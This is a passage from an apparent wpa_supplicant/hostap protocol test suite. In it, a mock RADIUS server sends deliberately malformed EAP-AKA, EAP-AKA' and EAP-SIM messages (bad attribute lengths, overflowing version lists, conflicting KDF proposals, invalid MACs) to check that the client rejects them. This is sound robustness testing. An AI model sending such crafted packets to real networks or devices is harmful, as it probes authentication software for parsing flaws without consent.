return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_PSEUDONYM, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_NEXT_REAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NEXT_REAUTH_ID, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RES length")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RES, 6, 0xffff, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTS length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_CHECKCODE length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RESULT_IND length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RESULT_IND, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_KDF")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_BIDDING length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_BIDDING, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 49):
eap = "AKA AKA'" if i == 11 else "AKA"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap=eap, identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0, 15 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_aka_prime(dev, apdev):
"""EAP-AKA' protocol tests"""
def aka_prime_handler(ctx, req):
logger.info("aka_prime_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA_PRIME)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with empty AT_KDF_INPUT")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with AT_KDF_INPUT")
return struct.pack(">BBHBBHBBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with duplicated KDF")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 2,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with incorrect KDF selected")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF not duplicated")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with selected KDF duplicated (missing MAC, RAND, AUTN)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple unsupported KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 2 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with multiple KDF proposals")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 3 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with invalid MAC, RAND, AUTN values)")
return struct.pack(">BBHBBHBBHBBBBBBHBBHBBHBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 * 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_AUTN, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - AMF separation bit not set)")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 9, 10,
0x2fda8ef7, 0xbba518cc)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Invalid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0, 1, 2, 3, 4,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - Valid MAC")
return struct.pack(">BBHBBHBBHBBBBBBHBBH4LBBH4LBBH4L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4 + 20 + 20 + 20,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF_INPUT, 2, 1, ord('a'), ord('b'),
ord('c'), ord('d'),
EAP_SIM_AT_KDF, 1, 1,
EAP_SIM_AT_MAC, 5, 0,
0xf4a3c1d3, 0x7c901401, 0x34bd8b01, 0x6f7fa32f,
EAP_SIM_AT_RAND, 5, 0, 5, 6, 7, 8,
EAP_SIM_AT_AUTN, 5, 0, 0xffffffff, 0xffffffff,
0xd1f90322, 0x40514cb4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF_INPUT length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF_INPUT, 2, 0xffff, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_KDF length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_KDF, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with large number of KDF proposals")
return struct.pack(">BBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBHBBH",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 12 * 4,
EAP_TYPE_AKA_PRIME, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_KDF, 1, 255,
EAP_SIM_AT_KDF, 1, 254,
EAP_SIM_AT_KDF, 1, 253,
EAP_SIM_AT_KDF, 1, 252,
EAP_SIM_AT_KDF, 1, 251,
EAP_SIM_AT_KDF, 1, 250,
EAP_SIM_AT_KDF, 1, 249,
EAP_SIM_AT_KDF, 1, 248,
EAP_SIM_AT_KDF, 1, 247,
EAP_SIM_AT_KDF, 1, 246,
EAP_SIM_AT_KDF, 1, 245,
EAP_SIM_AT_KDF, 1, 244)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(aka_prime_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 16):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_sim(dev, apdev):
"""EAP-SIM protocol tests"""
def sim_handler(ctx, req):
logger.info("sim_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_SIM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTN")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTN, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_VERSION_LIST overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_AUTS")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_AUTS, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_CHECKCODE")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_VERSION_LIST in Start")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No support version in AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_MAC and AT_RAND in Challenge")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_RAND in Challenge")
return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Insufficient number of challenges in Challenge")
return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too many challenges in Challenge")
